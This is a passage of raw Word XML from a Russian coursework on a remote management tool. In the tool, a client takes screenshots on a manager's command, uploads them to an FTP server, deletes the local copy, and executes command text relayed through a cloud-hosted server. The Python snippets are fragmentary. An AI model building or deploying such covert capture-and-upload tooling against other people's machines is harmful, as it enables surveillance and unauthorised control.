            </w:r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')</w:t>
            </w:r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</w:t>
            </w:r>
            <w:r w:rsidR="00D648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client_socket.</w:t>
            </w:r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sendto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(f'</w:t>
            </w:r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\t</w:t>
            </w:r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[*]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Sending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to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ftp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...'.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/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encode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(),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server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)</w:t>
            </w:r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</w:t>
            </w:r>
            <w:r w:rsidR="00D648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send_to_ftp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filename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)</w:t>
            </w:r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 </w:t>
            </w:r>
            <w:r w:rsidR="00D648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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00731E40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BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t>remove_file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filename</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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)</w:t>
            </w:r>
            <w:r w:rsidRPr="00731E40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val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00D648A1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val="en-US" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r w:rsidRPr="00731E40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731E4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  <w:t>pass</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="046BB683" w14:textId="77777777" w:rsidR="00731E40" w:rsidRPr="00731E40" w:rsidRDefault="00731E40" w:rsidP="00731E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BY" w:eastAsia="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09F4A982" w14:textId="77777777" w:rsidR="00156F5C" w:rsidRPr="004F6A75" w:rsidRDefault="00156F5C" w:rsidP="006805E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A178E29" w14:textId="77777777" w:rsidR="006805E4" w:rsidRDefault="006805E4" w:rsidP="006805E4">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">При получении клиентом от менеджера сообщения с командой запуска данной функции, модулем </w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pillow</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">создаётся скриншот и временно сохраняется в любой указанной директории. В данном случае, это </w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>С:\\</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProgramData</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>\\</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Screen</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jpg</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Далее вызывается фун</w:t>
      </w:r>
      <w:r w:rsidR="00EB2B7B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">ция </w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">выполняющая подключение и авторизацию к серверу по </w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00156F5C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>с последующей передачей файла на сервер. В случае успешного создания и отправки файл удаляется из директории клиента.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B57BA2" w14:textId="77777777" w:rsidR="00156F5C" w:rsidRPr="00156F5C" w:rsidRDefault="00156F5C" w:rsidP="00156F5C">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0154CD4C" w14:textId="77777777" w:rsidR="00156F5C" w:rsidRDefault="00156F5C" w:rsidP="00156F5C">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc105065723"/>
      <w:r w:rsidRPr="00360450">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="004F6A75">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00360450">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Разработка программы-менеджера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="2D548F1D" w14:textId="77777777" w:rsidR="00156F5C" w:rsidRDefault="00156F5C" w:rsidP="00156F5C"/>
    <w:p w14:paraId="20030F59" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRDefault="00156F5C" w:rsidP="00C82D53">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Программа менеджера отличается от клиентской программы лишь набором функционала. Менеджер предназначен для отправки команд</w:t>
      </w:r>
      <w:r w:rsidR="00EB2B7B" w:rsidRPr="00C82D53">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB2B7B">
        <w:t xml:space="preserve">непосредственно клиенту. </w:t>
      </w:r>
      <w:r w:rsidR="00C82D53">
        <w:t>Для этого необходимо получить от сервера список подключенных пользователей и выбрать одного из них в качестве текущего</w:t>
      </w:r>
      <w:r w:rsidR="006A5C0D">
        <w:t xml:space="preserve"> (см. рис. 2.2)</w:t>
      </w:r>
      <w:r w:rsidR="00C82D53">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30709712" w14:textId="77777777" w:rsidR="00156F5C" w:rsidRPr="00C82D53" w:rsidRDefault="00C82D53" w:rsidP="00156F5C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Клиент</w:t>
      </w:r>
      <w:r w:rsidR="006A5C0D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в свою очередь, может дать ответ только серверу, ввиду того что клиент-менеджер может иметь динамический </w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:t>-адрес.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A60658A" w14:textId="77777777" w:rsidR="00EB2B7B" w:rsidRDefault="00EB2B7B" w:rsidP="00156F5C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F245915" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRDefault="00EB2B7B" w:rsidP="006A5C0D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB2B7B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E261970" wp14:editId="26AABE6C">
            <wp:extent cx="3467400" cy="2941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32AE" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRDefault="006A5C0D" w:rsidP="006A5C0D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF6EB97" w14:textId="77777777" w:rsidR="00EB2B7B" w:rsidRDefault="00EB2B7B" w:rsidP="00EB2B7B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рисунок 2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="007A202D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбор клиента в меню управления менеджером</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB8EA68" w14:textId="77777777" w:rsidR="00EB2B7B" w:rsidRDefault="00EB2B7B" w:rsidP="00EB2B7B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A056209" w14:textId="77777777" w:rsidR="00EB2B7B" w:rsidRDefault="00EB2B7B" w:rsidP="00EB2B7B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Выбранному клиенту можно отправить сообщение, </w:t>
      </w:r>
      <w:r w:rsidR="00163263">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">текстом исполняемой команды. Перед отправкой сообщение необходимо преобразовать из текстового в тип </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2B7B">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2B7B">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8ECD56" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRDefault="00163263" w:rsidP="00EB2B7B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Для получения ответов от сервера клиент имеет метку «</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>». Таким образом, возможно эксплуатация инструмента с наличием нескольких менеджеров</w:t>
      </w:r>
      <w:r w:rsidR="00C82D53">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50681C74" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRDefault="00C82D53">
      <w:pPr>
        <w:spacing w:after="20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45188188" w14:textId="77777777" w:rsidR="00163263" w:rsidRPr="00163263" w:rsidRDefault="00C82D53" w:rsidP="00EB2B7B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lastRenderedPageBreak/>
        <w:t>Пример кода, описывающего отправку команд менеджером на сервер:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E0DC1" w14:textId="77777777" w:rsidR="00163263" w:rsidRPr="00163263" w:rsidRDefault="00163263" w:rsidP="00163263">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Листинг 2.9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63263" w:rsidRPr="006D560A" w14:paraId="19248B58" w14:textId="77777777" w:rsidTr="00163263">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9570" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
          </w:tcPr>
          <w:p w14:paraId="79D28CA9" w14:textId="77777777" w:rsidR="00163263" w:rsidRDefault="00163263" w:rsidP="00163263">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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</w:pPr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  <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D6B30A6" w14:textId="77777777" w:rsidR="00163263" w:rsidRDefault="00163263" w:rsidP="00163263">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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</w:pPr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en-US" w:eastAsia="ru-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> 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case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'1':</w:t>
            </w:r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  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os.</w:t>
            </w:r>
            <w:r w:rsidRPr="0016326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system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('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cls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')</w:t>
            </w:r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  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manager_socket.</w:t>
            </w:r>
            <w:r w:rsidRPr="0016326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sendto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(('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show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client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list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').</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0016326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encode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('utf-8'),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server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)</w:t>
            </w:r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  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input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('')</w:t>
            </w:r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case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'2':</w:t>
            </w:r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  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client_address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=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input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('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Enter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client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address</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0016326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\n</w:t>
            </w:r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-&gt;')</w:t>
            </w:r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  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client_port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=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int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(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input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('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Enter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client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 xml:space="preserve">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port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0016326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\n</w:t>
            </w:r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-&gt;'))</w:t>
            </w:r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br/>
              <w:t xml:space="preserve">    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os.</w:t>
            </w:r>
            <w:r w:rsidRPr="0016326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system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('</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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cls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0016326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  <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34361085" w14:textId="77777777" w:rsidR="00163263" w:rsidRPr="00163263" w:rsidRDefault="00163263" w:rsidP="00163263">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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FFFFF" w:themeFill="background1"/>
                <w:lang w:val="ru-BY" w:eastAsia="ru-BY"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A027E52" w14:textId="77777777" w:rsidR="00163263" w:rsidRDefault="00163263" w:rsidP="00EB2B7B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="ru-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CB4D0FA" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRDefault="00C82D53" w:rsidP="00EB2B7B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Изначально,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">не предусматривалось подключение программы-менеджера к серверу по </w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Решение было принято ввиду кроссплатформенности сервера. Его можно развернуть на платформе </w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">после чего, непосредственно на сервере, просматривать полученные по </w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:i/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>файлы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC1E1B4" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRDefault="00C82D53" w:rsidP="00EB2B7B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFCC341" w14:textId="77777777" w:rsidR="00B77291" w:rsidRDefault="00B77291">
      <w:pPr>
        <w:spacing w:after="20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3ADB8109" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRPr="00FA0359" w:rsidRDefault="00C82D53" w:rsidP="00C82D53">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc105065724"/>
      <w:r w:rsidRPr="00C82D53">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0359">
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Выполнение программ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="11F209BE" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRPr="00141563" w:rsidRDefault="00C82D53" w:rsidP="00C82D53"/>
    <w:p w14:paraId="0D6C7ED7" w14:textId="77777777" w:rsidR="00C82D53" w:rsidRDefault="00C82D53" w:rsidP="00C82D53">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc105065725"/>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00141563">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r>
        <w:t>Развёртывание сервера</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="164AB628" w14:textId="77777777" w:rsidR="00873682" w:rsidRDefault="00873682" w:rsidP="00873682">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3ACAE9" w14:textId="77777777" w:rsidR="00873682" w:rsidRDefault="00873682" w:rsidP="00873682">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Одним из вариантом развёртывания сервера, удовлетворяющему условию доступности является размещение серверной программы на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>хостинговых</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> платформах либо в частных локальных сетях с </w:t>
      </w:r>
      <w:r w:rsidRPr="00873682">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r>
        <w:t>-преобразованием адресов и портов «наружу».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29873732" w14:textId="77777777" w:rsidR="00873682" w:rsidRDefault="00873682" w:rsidP="00873682">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">На момент написания курсовой работы сервер успешно было размещён в </w:t>
      </w:r>
      <w:r w:rsidRPr="00873682">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>droplet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> у провайдера облачных инфраструктур –</w:t>
      </w:r>
      <w:r w:rsidRPr="00873682">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00873682">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DigitalOcean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00873682">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00873682">
        <w:t>[2].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435D37E1" w14:textId="77777777" w:rsidR="00B77291" w:rsidRDefault="00B77291" w:rsidP="00873682">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Для доступности сервера необходимо поддерживать постоянный адрес обращения к серверу для того, чтобы клиенты могли осуществлять подключение в любой момент выхода устройства в сеть. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A358DD9" w14:textId="77777777" w:rsidR="00B77291" w:rsidRDefault="00B77291" w:rsidP="00873682">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Данное условие устанавливает ограничение на бессрочное закрепление </w:t>
      </w:r>
      <w:r w:rsidRPr="00B77291">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77291">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">адреса за сервером, что является относительно дорогостоящим либо трудновыполнимым условием. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238FB93E" w14:textId="77777777" w:rsidR="00EB2B7B" w:rsidRPr="00C82D53" w:rsidRDefault="00B77291" w:rsidP="00B77291">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Для решения данной проблемы можно в клиентских программах установить обращение к доменному имени, которое впоследствии будет разрешаться в </w:t>
      </w:r>
      <w:r w:rsidRPr="00B77291">
        <w:rPr>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B77291">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>адрес, и передастся в клиентский сокет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC23938" w14:textId="77777777" w:rsidR="00B77291" w:rsidRDefault="00B77291" w:rsidP="00B77291">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
